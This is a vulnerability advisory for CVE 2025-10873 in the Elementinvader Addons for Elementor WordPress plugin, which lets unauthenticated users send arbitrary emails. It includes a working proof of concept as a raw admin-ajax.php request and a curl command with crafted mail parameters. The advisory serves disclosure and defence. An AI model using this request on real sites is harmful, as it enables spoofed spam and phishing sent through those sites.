Elementinvader Addons for Elementor < 1.4.1 – Unauthenticated Arbitrary Email Sending | CVE 2025-10873

Description

The plugin allows unauthenticated user to send arbitrary e-mails to arbitrary addresses due to missing authorization on the elementinvader_addons_for_elementor_forms_send_form action.

Proof of Concept

v < 1.4.1
Open a page where the Eli Contact Form is embed (via Elementor Builder), submit the contact form with dummy data and intercept the request, then add the following parameter to the request and forward it (the eli_token is only valid once, and tied to the request IP address as well as User Agent, but a new one can be retrieved by refreshing the page with contact form):

mail_data_subject=PoC — unauth mail&mail_data_to_email=poc@local.test&mail_data_from_name=Site Notifications&mail_data_from_email=no-reply@local.test&usermail=reporter@local.test&message_body=Hello from PoC

Example of raw request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 408
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/2025/09/29/elementor/

element_id=78642272&eli_token=4k1xH6huwwnhlK43JTxyRlAG6i2sdARB&eli_nonce=f00022849d&eli_id=4affc60&eli_type=eli-contact-form&eli_page_id=369&action=elementinvader_addons_for_elementor_forms_send_form&mail_data_subject=PoC — unauth mail&mail_data_to_email=poc@local.test&mail_data_from_name=Site Notifications&mail_data_from_email=no-reply@local.test&usermail=reporter@local.test&message_body=Hello from PoC

v < 1.4.0
The eli_nonce value can be retreived from a page/post where the Eli Contact Form is embed (via Elementor Builder)

```
curl -i -X POST "http://example.com/wp-admin/admin-ajax.php" \
  -d "action=elementinvader_addons_for_elementor_forms_send_form" \
  -d "element_id=123" \
  -d "shortcode=1" \
  -d "mail_data_subject=PoC — unauth mail" \
  -d "mail_data_to_email=poc@local.test" \
  -d "mail_data_from_name=Site Notifications" \
  -d "mail_data_from_email=no-reply@local.test" \
  -d "usermail=reporter@local.test" \
  -d "message_body=Hello from PoC" \
  -d "eli_nonce=NONCE" \
  -d "eli_token=g7h1NEbnrvOZjTK5qwUF3xAGGCHaSN6X"
```

Expected result (HTTP):

`200 OK with JSON {"code":"success","success":"true", ...}.`

Expected result (email):

* 1 email to poc@local.test with From/Subject/Body as provided in the POST.
* 1 “confirmation” email to the first POST value that looks like an email (e.g., reporter@local.test via usermail), used as Reply-To.